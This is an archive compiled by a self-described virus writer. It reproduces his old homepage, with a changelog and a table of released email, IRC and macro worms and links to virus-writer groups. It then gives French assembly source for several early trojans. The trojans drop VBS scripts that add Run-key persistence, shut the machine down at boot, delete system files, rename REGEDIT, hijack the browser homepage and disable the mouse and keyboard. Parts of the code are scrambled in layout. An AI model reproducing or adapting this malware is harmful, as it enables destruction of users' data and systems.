PetiK Archiver 1.

0
17/05/2009
After 7 years to stop coding virus/worms, I decided to assemble all my works. It is sorted by date like this : YYYYMMDD (where Y is the year, M the month and D the day) and the name of the works. In the begining you can see my old website page. Then my works. Newt, my not finish works and some articles. Best reading.

PetiK Homepage
(last update : July 9 th 2002)

EMAIL : petikvx@aol.com

NEW : FORUM FOR ALL VXERS : CLICK HERE PLEASE SIGN MY GUESTBOOK : CLICK HERE 2002: July 9th : GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE MY WORKS LIKE YOU AND WILL HELP YOU IN YOUR VX-LIFE. IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK. Special Thanx to : alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98and the greatest coder group : 29A July 7th : Add some new descriptions of AV (from Trend Micro and McAfee) July 3rd : Add the binary of my last Worm coded with alc0paul : VB.Brigada.Worm July 2nd : Add a new link : Second Part To Hell June 29th : Add my new tool : PetiK’s VBS Hex Convert and add my last full spread VBS worm : VBS.Hatred June 26th : Add W32/HTML.Dilan June 24th : Add VBS.Park June 22nd : I finish my new worm : VB.DocTor.Worm June 20th : PETIKVX EZINE #2 REALIZED : DOWNLOAD IT and add a new tool : CryptoText and my last worm : VB.Mars.Worm June 19th : Add VBS.Cachemire. Add my new article VBS/HTML Multi-Infection. June 16th : I join a new Virus Group : Brigada Ocho (create by alc0paul) June 1st : Add VB.Lili.Worm. My new worm is released : I-Worm.Haram May 31st : I leave the rRlf group May 23rd : New Ezine : rRlf#2 May 19th : I remove some source. You can find of them in PetiKVX#1 and the other in PetiKVX#2. Finish VB.Visual.Worm published in PetiKVX #2 May 14th : Add W97M.ApiWord May 12th : Add W32.HLLW.Archiver May 10th : Add a new tool to protect against new VBS Worm : PPVBSW May 9th : Add a new macro virus : W97M.AutoSpread May 8th : I join the rRlf group (http://www.rrlf.de). Add HTML.Welcome. May 6th : Add a new article : VBS Tutorial and exist in PDF April 27th : Add VBS.Xchange April 21st : Add all source of my works. April 7th : Add my first Ezine : PetiKVX Ezine #1. My new email is Petikvx@aol.com March 15th : Add I-Worm.Together March 14th : My new email : petikvx@lycos.fr (petikvx@multimania.com failed)

March 10th : Add W32.HLLW.LiteLo March 9th : Add my articles in PDF format : articlesPDF and 29A#6. March 8th : Add my first VBS worm and HTML virus generator : PSWVG (W32.PSVG.gen : Norton AntiVirus, Constructor.VBS.PSWVG.10 : AVP) March 3rd : Add a new virus/worm : VBS/W97M.Doublet February 25th : Add a macro virus : W97M.Wolf February 24th : Add a lame love worm : HTML.Linda February 22nd : Add W32.HLLW.Wargames February 18th : Add a new Ezine : rRlf February 16th : Add my first virus (perhaps bug) : WinRAR.Linda February 14th : Add a new HTML virus : HTML.Macrophage February 10th : Can download my last worm. Add my second article : Technics February 7th : Finish my last worm : I-Worm.Falken (can’t download immediately) February 4th : Add new worm : I-Worm.Extract February 1st : New Worm : W32/W97M.Twin January 27th : I come back with a new worm : HLLW.SingLung.Worm January 20th : Add PetiKShow. This program contains all the sources of my works. January 10th : Add an old article about Worm Spreading written by me on September 19th . January 1st : HAPPY NEW YEAR. I DECIDED TO STOP TO CODE VIRII AND WORM. GOOD BYE 2001: December 10th : Add my last worm : W32.HLLW.Last November 6th : I-Worm.Anthrax October 12th : I-Worm.WTC September 8th : I-Worm.Passion September 2nd : I-Worm.Rush August 24th : I-Worm.Casper August 18th : Add the tool tElock 5.1 (A compress/encrypted PE file) August 16th : I-Worm.Kevlar August 12th : New design. You can hear one of my compositions. August 9th : New descrption from AVP about I-Worm.MadCow and I-Worm.Friends. August 8th : I-Worm.XFW July 18th : New Fanily : W32.Pet_Tick family (6), VBS.Pet_Tick family (3) from Norton Antivirus July 8th : I-Worm.MaLoTeYa July 3rd : VBS.Delirious June 30 th : I-Worm.Bush June 19th : I-Worm.Winmine June 18th : W97M.Blood June 17th : VBS.Seven June 10th : VBS.Starmania, I-Worm.Gamma, W97M.Kodak June 4th : BAT.Quatuor June 3rd : Bastille, JS.Germinal June 2nd : Add some Worms : HTML.Embargo, I-Worm.Mustard May 25th : I start my homepage.

Source
You can found here my different worms that I create :

Real Name

Date

AntiVirus Name (TM=Trend Micro)

Description

Bastille

06/03/2001

AVP : IRC.Worm.PetiK TM : Bat.PetiK.A

It's a DOS worm. It uses mIRC to spread. On July 14th, he stops the computer

BAT.Quatuor

06/04/2001

IRC.Becky.A

A BAT file which uses mIRC to spread.

CryptoText

06/20/2002

Coded in VB6. Encrypt ASCII file.

HTML.Bother.3180 HTML.Bother 05/13/2001 AVP : VBS.Both TM : HTML.Bother.A

It is script that uses ActiveX controls to perform actions. It modifies the default home page. It infects to all .HTM and .HTML files that it founds in the \MY DOCUMENTS and \WINDOWS\WEB folders. The default icon for .html files is changed.

HTML.Embargo

05/29/2001

VBS.Embaro.A.Intd

It copies itself to \WINDOWS\WinHelp.htm. Change the AUTOEXEC.BAT. It uses mIRC channel to spread

HTML.Linda

02/24/2002

Lame love worm.

HTML.Macrophage

02/14/2002

HTML.Prepend Panda : HTML/Mage

Infect htm,html,htt,hta and asp files in different special folders.

VBS.Manu@mm HTML.Welcome 05/08/2002 TM : VBS.PATIK.G

My first virus for rRlf group. Infects web files (htm,html,htt,asp) and spread with Outlook into a VBS file.

W95.Pet_Tick.gen I-Worm.Anthrax 11/06/2001 TM : Worm.Pettick.A Sophos : W32/Petick-A

Open WAB default file to take some email and spread with MAPI. Spread with mIRC too.

W95.Pet_Tick.E@mm I-Worm.Bush 06/30/2001 AVP : I-Worm.PetiK.e Uses MAPI to spread. Not BUGS.

I-Worm.Casper

08/24/2001

TM : Worm.Capser.A

It‘s a utility which detect Happy99 and Icecubes. Uses MAPI. Perhaps bugz.

I-Worm.Dandelion

11/16/2001

UNRELEASED WORM

Panda : W32/Extract I-Worm.Extract 02/04/2002 TM : WORM.PETIK.L Open KERNEL32.DLL to find API.

I-Worm.Falken

07/02/2002

First WGAA Worm. WARNING !

I-Worm.Friends

05/05/2001

W32.Pet_Tick.B W32.Fiend.Worm AVP : I-Worm.PetiK.b

It uses a VBS file and mIRC to spread. he alters the Window's owner and company.

I-Worm.Gamma

05/09/2001

W95.Pet_Tick.D@mm W95.Wormfix.Worm@mm AVP : I-Worm.PetiK.c

Scan all *.*htm* file in "Temporary Internet Files" and uses MAPI function to spread

I-Worm.Haram

06/01/2002

Spread with a randome VBS file in StartUp folder and put an HTML virus.

I-Worm.Kevlar

08/16/2001

W32.Pet_tick.M TM : Worm.Kevlar.A Panda : Worm.PetiK.C

Infect C???????.exe. Scans some email address in the Outlook Address Book and uses MAPI to spread.

W32.Pet_Tick.Intd Sophos : W32/Petik-K Uses MAPI function to spread.

I-Worm.Loft

06/23/2001 AVP : I-Worm.PetiK.k TM : Worm.PetiK.K

Open some DLL files to uses some API.

I-Worm.MadCow

12/01/2000

W32.Pet_Tick.A@mm W32.Salut.Worm@mm AVP:I-Worm.PetiK.a

It's my first worm. It uses Outlook and mIRC to spread. It creates \SYSTEM\MSLS.ICO and will be the default icon of .exe files.

W32.Pet_Tick.G W32.Malot.Int I-Worm.MaLoTeYa 07/08/2001 AVP : I-Worm.PetiK.f TM : Worm.Malot.A

Uses MAPI to spread. Create a HTML file in the StartUp folder to send some informations about the user. CONTRIBUTE TO 29A#6.

W32.Update.Worm I-Worm.Mustard 05/27/2001 AVP : I-Worm.PetiK.d TM : Worm.Mustard.A

Modify "Exclude.dat" in the "Install Folder" of Norton Antivirus to create a VBS file. The worm spread with Outlook which use this VBS file.

I-Worm.Passion

09/08/2001

W95.Pet_Tick.gen

Copy all mail of Outlook Address Book in a file and scans this file to spread. Change some URL 1 times of 10.

W95.Pet_Tick.C@mm W95.Buggy.Worm@mm I-Worm.PetiK 02/07/2001 AVP : I-Worm.IEPatch TM : Worm.PetiK.A

Modify the Wallpaper with a BMP file that it download to a ftp site. He spread with a VBS file which use Outlook.

I-Worm.Rush

02/09/2001

TM : Worm.Rush.A

Not bugz for MAPI functions. Start of propagation by error on August 30th . Some payloads with some titles of windows.

I-Worm.Together

03/15/2002

W32.Pet_Tick.AC@mm

Kill some AV. 100% assembler.

W32.Mineup.Worm

AVP : I-Worm.Petik I-Worm.Winmine 06/19/2001 McAfee:W32/PetTick@MM Panda : W32/PetTick Uses Outlook to spread.

Sophos : W32/Petik-WTC I-Worm.WTC 10/11/2001 TM : WORM.PETTICK.Q

A Worm against the terrorism. Infect RAR files in the Personal directory.

W95.Pet_tick.gen I-Worm.XFW 08/08/2001 TM : Trojan.PetiK.XFW Panda : Worm.PetiK.D Infect WSOCK32.DLL and all DLL files in the SYSTEM directory.

JS.Lamnireg.A Trojan JS.Germinal 06/02/2001 AVP : JS.Germinal TM : JS.Germinal.A

It infects JS file in \WINDOWS, \WINDOWS\Desktop and \WINDOWS\SAMPLES\WSH directories. It uses mIRC to spread.

VB.Brigada.Worm

07/03/2002

TM : WORM.CRAZYBOX.A

Coded with alc0paul and spread with Macro Word, ZIP and Outlook. My last worm.

W32/W97M.Dotor.Worm VB.DocTor.Worm 06/22/2002 McAfee : W32/DoTor Panda : W32/Dotor.A It spread by infecting DOC files

W32.Pet_Ticky.B VB.Lili.Worm 06/01/2002 Panda : W32/Petlil.A A lame worm with a XXX picture

W32.Gubed.Worm VB.Mars.Worm 06/20/2002 McAfee : W32/Gubed TM : WORM.GUBED.A

This worm spread by scaning the start page of Internet Explorer to find some email. The binary is also stocking into a VBS file in the %StartUp% folder.

VB.Visual.Worm

05/19/2002

W32.Pet_Ticky.gen

My first worm coded in Visual Basic. Lame worm.

VBS.Cachemire

06/19/2002

A worm which spread in a local network and have a greate power

of spreading.

VBS.Delirious

07/03/2001

VBS.Pet_Tick.C@m VBS.Ketip.C@m AVP : I-Worm.Petik.h

Put his code in NORMAL.DOT

VBS/W97M.Doublet

03/03/2002

VBS.Doublet@mm

This virus infects VBS and DOC files. Spread with Outlook.

VBS/W97M.Xchange

04/27/2002

This worm/virus infects VBS files and DOC documents Word. CONTRIBUTE TO RRLF#2

VBS.GoodBye

12/01/2001

UNRELEASED WORM

VBS.Hatred

06/29/2002

Encrypt with my tool “PetiK’s VBS Hex Convert”

VBS.Judge

12/08/2000

VBS.Pet_Tick.B@mm VBS.Ketip.B@mm

Use ftp to download a file (virus ?, trojan horse ?). If we are the 1st of the month, Judge modifies the AUTOEXEC.BAT.

VBS.Park

06/24/2002

A VBS/HTML multi-infection virus

VBS.PetiK

01/31/2001

VBS.Pet_Tick.A@mm VBS.Ketip.A@mm AVP : I-Worm.LeeBased

It arrives as an HTML email message. It use Outlook and mIRC clients to spread. It infects different files and sends some information from infected computer to 2 email addresses.

VBS.Chism@mm VBS.Copy.A@mm VBS.Seven 06/18/2001 AVP : I-Worm.Petik.i TM : VBS.PETIK.I Many actions in any day

VBS.ManiaStar.A@mm VBS.Starmania 06/15/2001 AVP : IRC-

It infects all VBS files in different folders. It spread with three different subject, body and

Worm.generic.vbs

attachment.

W32.HLLW.Archiver

05/12/2002

Infect ZIP files in certain folders.

W32.HLLW.Last

10/12/2001

Sophos : W32/Stall-A

My very first (and last) worm written with Borland C++.

W32.HLLW.LiteLo

03/10/2002

A lame HLL worm.

W32.HLLW.SingLung

01/27/2002

AVP : I-Worm.Stopin

Open *.ht* file to find some email and spread with MAPI functions.

W32.HLLW.Wargames

02/22/2002

AVP : I-Worm.WarGam Viruslist : WarGame W32.WarGam.Worm

Differents way of propagation : open *htm files, old mail read and Outlook Address

W32/W97M.Twin

02/01/2002

W97M.Comical Sophos : W97M.Comical

This worm uses VBA and W32asm to spread.

W32/HTML.Dilan

06/26/2002

Spread via HTML files by infecting them in specifics folders.

Win32RAR.Linda

02/16/2002

This virus infects RAR files while adding the virus and HTM files while adding a script.

W97M.ApiWord

05/14/2002

W97M.Apish

Uses some API to infect Word Document

W97M.AutoSpread

05/09/2002

W97M.Beko@mm

A large spreading. Export “Sleep” API

W97M.Blood

06/18/2001

W97M.Pet_Tick.Intd W97M.Ketip.Intd AVP : Embedded

Infect NORMAL.DOT.

W97M.Adok.A W97M.Kodak 06/10/2001 AVP:Macro.Word97.Adok Infect NORMAL.DOT.

W97M.OutlookWorm.Gen AVP : 06/05/2001 Macro.Office.Melissabased TM : W97M.AYAM.A It uses mIRC and Outlook to spread.

W97M.Maya

W97M.Wolf

02/25/2002

W97M.Droopy.A

Infect .doc files with the “Wolf” module. Thanx to Walrus

Links
A selection of the best virii sites : VirLinux : http://www.virlinux.fr.fm VIRUS CODERS : Alc0paul : http://alcopaul.cjb.net Belial : http://home.foni.net/~belial Benny : http://www.coderz.net/benny Black Jack : http://blackjackvx.cjb.net Del_Armg0 : http://www.delly.fr.st French coder FlyShadow : http://flyshadow.cjb.net Gigabyte : http://www.coderz.net/gigabyte Immortal Riot : http://www.immortalriot.cjb.net Kalanar : http://virii.at/ak or http://www.kvirii.com.ar Lord Julus : http://lordjulus.cjb.net NBK : http://www.nbk.hpg.ig.com.br Nucleii : http://www.coderz.net/nucleii/main.html Pointbat : http://pbat.cjb.net/ French coder Silvio : http://www.big.net.au/~silvio/ Ratter : http://www.coderz.net/ratter/ SPTH (Second Part To Hell) : http://www.spth.de.vu/ The Walrus : http://walrus.up.to Tipiax : http://www.multimania.com/tipiax French coder Vecna : http://www.coderz.net/asm_infamy VirusBuster : http://vtc.cjb.net Voven/SMF : http://vovan-smf.wz.cz/ VXUniverse : http://vxuniverse.cjb.net ZeMacroKiller98 : http://www.crosswinds.net/~zemacrokiller98/index.htm French coder A French site about virii’s Linux

Zulu : http://www.coderz.net/zulu VX GROUPS : 29A : http://29a.host.sk ASM : http://kickme.to/asm BlackArt : http://blackart.cjb.net Black Cat virii Group : http://www.ebcvg.com or http://bcvgvx.cjb.net/ Brigada Ocho : http://brigada8.cjb.net HFX : http://www.hfactorx.org/ Indonesian Virus : http://indovirus.8m.com/ Kryptocrew : http://www.kryptocrew.de LineZero : http://www.coderz.net/lz0vx/start.htm MATRiX : http://www.coderz.net/mtxvx NoMercy : http://www.coderz.net/nomercy/ Pinoy Virus Writer : http://hackers.b3.nu rRlf : http://www.rrlf.de/ ShadowVX : http://shadowvx.members.easyspace.com/ SMF : http://www.sallyone.com/smf/e_index.htm , http://smfgroup.cjb.net Ultimate Chaos : http://www.ultimatechaos.co.uk/ Virus Brasil : http://www.virusbrasil.8m.com OTHER SITES : Coderz : http://www.coderz.net Red Virica : http://redvirica.host.sk/ Virii Argentino : http://www.virii.com.ar Virus Central : http://www.viruscentral.org/ VirusList : http://www.viruslist.com Virus Trading Center : http://www.oninet.es/usuarios/darknode/ VX-DNET : http://surf.to/vxdnet VX Heavens : http://vx.netlux.org/ Virus Trading : http://www.virustrading.com/ VX Universe : http://vxuniverse.cjb.net/ ExeTools : http://www.exetools.com ProTools : http://protools.cjb.net ANTIVIRUS SITES : AVP : http://www.avp.ch Symantec : http://www.symantec.com/avcenter Trend Micro : http://www.trendmicro.com CONTACT : GuestBook
© 2001-2002 PetiK. All informations on this site is for educational purpose only .

;TAILLE : 475 OCTETS ;DWARF crée un fichier dwarf.vbs qui ajoutera une clé afin ;que l'ordinateur s'éteigne au démarrage .model small .code org 100h DEBUT : mov ah,09h lea dx,text1 int 21h mov ah,1 int 21h cmp al,'C' je CREER_FICHIER cmp al,'c' je CREER_FICHIER cmp al,'Q' je FIN_PROGRAMME cmp al,'q' je FIN_PROGRAMME mov dx,offset bad mov ah,9h int 21h jmp TOUCHE ;affiche un message ;avec deux proposition ;lecture du caractŠre

31/08/00

TOUCHE:

;si 'C-c' on continue

;si 'Z-z' on stop ;mauvaise touche

CREER_FICHIER:

mov ah,3Ch xor cx,cx mov dx,offset NOM int 21h ECRIRE_FICHIER: xchg ax,bx mov ah,40h mov cx,meslen mov dx,offset note int 21h FERMER_FICHIER: mov ah,3Eh int 21h mov dx,offset updir mov ah,3Bh int 21h MESSAGE: mov ah,09h lea dx,msg int 21h

;CREE UN FICHIER ;ET LUI DONNE UN NOM ;ECRIT DANS LE FICHIER

;PUIS LE REFERME ;CHANGEMENT DE REPERTOIRE

;AFFICHE LE MESSAGE

FIN_PROGRAMME : mov ah,4Ch int 21h text1 bad NOM updir msg note prog db db db db db db db db db db db db db db

;FERME LE PROGRAMME

10,13,'Tape C pour continuer ou Q pour quitter : $' 7,7,8,' ',8,24h 'c:\dwarf.vbs',0 '..',0 7,7,7,10,13,'SALUT MEC !!!!' 10,10,13,'UN FICHIER A ETE RAJOUTE' 10,13,'IL SE NOMME C:\dwarf.vbs $' 'rem DwArF.vbs by Panda ' '(c) 2000' 'Dim WSHShell',0Dh,0Ah 'Set WSHShell = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah 'WSHShell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\' 'Windows\CurrentVersion\Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE ' 'C:\Windows\system\User.exe,ExitWindows"'

meslen

equ $-note

end DEBUT

;Par M.Xxxxxxx XXXXXXX (c)2000 ;TAILLE : 689 OCTETS ;TESTE LE PREMIERE FOIS AU LYCEE KIRSCHLEGER DE MUNSTER ;DWARF259 CREE DEUX PROGRAMME : ; -Dwarf.vbs dans C: active Evil.com … chaque d‚marrage ; -Evil.com dans C:\WINDOWS. ;Le 25 septembre, il renomme REGEDIT.EXE dans la corbeille ;en DWARF.AZE et efface AUTOEXEC.BAT et WIN.INI .model small .code org 100h TOUT_DEBUT: VERIFICATION: jmp FILE1 mov ah,2Ah int 21h cmp dh,9 jnz FIN_VIRUS cmp dl,25 jnz FIN_VIRUS ah,9 dx,MSG 21h ah,41h mov dx,offset AUTOEXEC int 21h dx,offset WININI int 21h ah,56h mov dx,offset REG mov di,offset CORBEILLE 21h mov ah,4Ch int 21h

09/09/00

;25 SEPTEMBRE ? ;NON : FIN DU TROJAN

AFFICHE: DISQUE:

mov lea int mov mov mov int

;EFFACE AUTOEXEC.BAT ;EFFACE WIN.INI ;RENOMME REGEDIT.EXE ;EN DWARF.AZE

FIN_VIRUS: MSG db db db db db db db

7,7,7,'TROJAN.DWARF par PandaKiller (c)2000' 10,10,13,'BOOM! BOOM! BOOM! BOOM! BOOM! BOOM!' 10,13,' ÛÛÛ Û Û ÛÛ ÛÛÛ ÛÛÛÛ' 10,13,' Û Û Û Û Û Û Û Û Û ' 10,13,' Û Û Û Û ÛÛÛÛ ÛÛÛ ÛÛÛ ' 10,13,' Û Û Û Û Û Û Û Û Û Û ' 10,13,' ÛÛÛ Û Û Û Û Û Û Û $'

WININI db 'C:\WINDOWS\Win.ini',0 AUTOEXEC db 'C:\autoexec.bat',0 REG db 'C:\WINDOWS\Regedit.exe',0 CORBEILLE db 'C:\RECYCLED\dwarf.aze',0 progl2 equ $-VERIFICATION FILE1: mov ah,3Ch xor cx,cx mov dx,offset NOM1 int 21h xchg ax,bx mov ah,40h mov cx,progl1 mov dx,offset prog1 int 21h mov ah,3Eh int 21h mov ah,3Ch xor cx,cx mov dx,offset NOM2 int 21h xchg ax,bx mov ah,40h mov cx,progl2 lea dx,VERIFICATION int 21h mov ah,3Eh int 21h mov ah,4Ch int 21h

;CREATION DU 1ER FICHIER ;LONGUEUR DU PROGRAMME ;DEBUT DU PROGRAMME ;ECRITURE ;FERMETURE

FILE2:

;CREATION DU 2ND FICHIER ;LONGUEUR DU PROGRAMME ;DEBUT DU PROGRAMME ;ECRITURE ;FERMETURE

FIN: NOM1 NOM2 prog1

db 'c:\Dwarf.vbs',0 db 'c:\WINDOWS\Evil.com',0 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah

db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah db 'Dim W',0Dh,0Ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"' progl1 equ $-prog1 end TOUT_DEBUT

;Par M.Xxxxxxx XXXXXXX (c)2000 12/09/00 ;TAILLE : 1282 OCTETS ;DWARF7 CREE DEUX PROGRAMME : Dwarf.vbs et Panda.vbs. DWARF.VBS VA ;RAJOUTER UNE CLE POUR ACTIVER PANDA.VBS TOUS LES JOURS. PANDA.VBS ;ENTRE EN ACTION QUE LE 5 DECEMBRE. IL RAJOUTE UNE CLE POUR ETEINDRE ;L'ORDINATEUR AU DEMARRAGE ET CREE UN FICHIER AUTOEXE.BAT QUI ;SUPPRIMERA DES FICHIER SUR L'ORDINATEUR. .model small .code org 100h FILE1: mov ah,3Ch xor cx,cx mov dx,offset NOM1 int 21h ;cr‚ation du 1er fichier xchg ax,bx mov ah,40h mov cx,progl1 mov dx,offset prog1 int 21h ;‚criture mov ah,3Eh int 21h ;fermeture FILE2: mov ah,3Ch xor cx,cx mov dx,offset NOM2 int 21h ;cr‚ation du 2nd fichier xchg ax,bx mov ah,40h mov cx,progl2 mov dx,offset prog2 int 21h ;‚criture mov ah,3Eh int 21h ;fermeture MESSAGE: mov ax,3 int 10h mov ah,9 lea dx,msg int 21h FIN: mov ah,4Ch int 21h NOM1 NOM2 prog1 db 'c:\Dwarf.vbs',0 db 'c:\WINDOWS\Panda.vbs',0 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah db 'Dim W',0Dh,0Ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah db 'W.Regwrite "HKLM\Software\Microsoft\Windows' db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"' progl1 equ $-prog1 prog2 db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0DH,0Ah db 'Dim W',0DH,0Ah db 'Set W=CreateObject("WScript.Shell")',0DH,0Ah db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\' db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE ' db '%windir%\system\user.exe,Exitwindows"',0DH,0Ah db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\' db 'Run\DwArF2", "C:\autoexe.bat"',0DH,0Ah db 'Set X=CreateObject("Scripting.FileSystemObject")',0DH,0Ah db 'file="C:\autoexe.bat"',0DH,0Ah db 'Set O=X.CreateTextFile(file, True, False)',0DH,0Ah db 'O.Writeline "@echo off"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.ini"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.bmp"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\E*.*"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\M*.*"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0DH,0Ah db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0DH,0Ah db 'End If',0DH,0Ah progl2 equ $-prog2 msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh db 'IL SE NOMME C:\Dwarf.vbs',10,10,13 db 'OUVRE LE VITE $' end FILE1

;Panda3.asm par PandaKiller ;TASM32 /M /ML panda3 ;TLINK32 -Tpe -x -aa panda3,,,import32 .386 locals jumps .model flat extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn MessageBoxA:PROC extrn WinExec:PROC extrn ExitProcess:PROC .data octets flz_handle nom_fichier prog TEXTE TITRE TEXTE2 TITRE2 CLE DONNEE NOM p l dd dd db db db db db db db db db db db dd dd

03/10/00

? ? 'C:\Salut.vbs',00h 'C:\Salut.vbs',00h 'Salut ! Ca va ?',00h 'Hello',00h 'J''ai mis un fichier sur ton ordinateur',0dh,0ah 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah 'Ouvre-le vite',00h 'FICHIER CREE',00h '\Software\Microsoft\Windows\CurrentVersion',00h 'PandaKiller',00h 'RegisteredOwner',00h 0 0

DEBUTV: db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah db '',0dh,0ah db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set win = a.GetSpecialFolder(0)',0dh,0ah db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah db 'INTERNET()',0dh,0ah db 'BUG2001()',0dh,0ah db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah db 'Sub INTERNET()',0dh,0ah db 'Dim W',0dh,0ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\' db 'Start Page", "http://www.penthouse.com"',0dh,0ah db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\' db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah db 'Sub BUG2001()',0dh,0ah db 'If Year(Now) = 2001 Then',0dh,0ah db ' Dim P',0dh,0ah db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\' db 'Stop1", "rundll32,mouse disable"',0dh,0ah db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\' db 'Stop2", "rundll32,keyboard disable"',0dh,0ah db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah db 'End If',0dh,0ah db 'End Sub',0dh,0ah taille equ $-DEBUTV .code REGISTRE: push offset l

FICHIER:

MESSAGE:

FIN: end REGISTRE

push push push push push push push push call push push push push push push call push call push push push push push push push call mov push push push push push call push call push push push push call push push push push call push push call push call

offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE 80000002h RegCreateKeyExA 05h offset DONNEE 01h 0 offset NOM p RegSetValueExA 0 RegCloseKey 00h 80h 02h 00h 01h 40000000h offset nom_fichier CreateFileA [flz_handle],eax 00000000h offset octets offset taille offset DEBUTV [flz_handle] WriteFile [flz_handle] CloseHandle 40h offset TITRE offset TEXTE 0 MessageBoxA 40h offset TITRE2 offset TEXTE2 0 MessageBoxA 1 offset prog WinExec 0 ExitProcess

;HKEY_LOCAL_MACHINE ;PandaKiller ;DANS RegisteredOwner ;CREE UN REGISTRE ;FERME LA BASE DE REGISTRE

;DONNE LE NOM DU FICHIER

File Panda3.exe received on 05.16.2009 18:00:23 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Generic.Malware.Ssp!.1E162891 Generic.Malware.Ssp!.1E162891 Type_Script W95.Pet_Tick.gen -

Additional information File size: 8192 bytes MD5...: 104229b6d583df50db044f0d89fc7db9 SHA1..: db05dc880b74d864a8c47d8db22c2847b655c14a

comment $ W32.PandaKiller.A par PandaKiller le 12 octobre 2000 CREER DEUX REPERTOIRE : - C:\PandaKiller - %windir%\Panda S'AUTO-COPIE DANS : - %windir%\Pandakiller.exe - %windir%\Panda\Stages.exe - %system%\Monopoly.exe

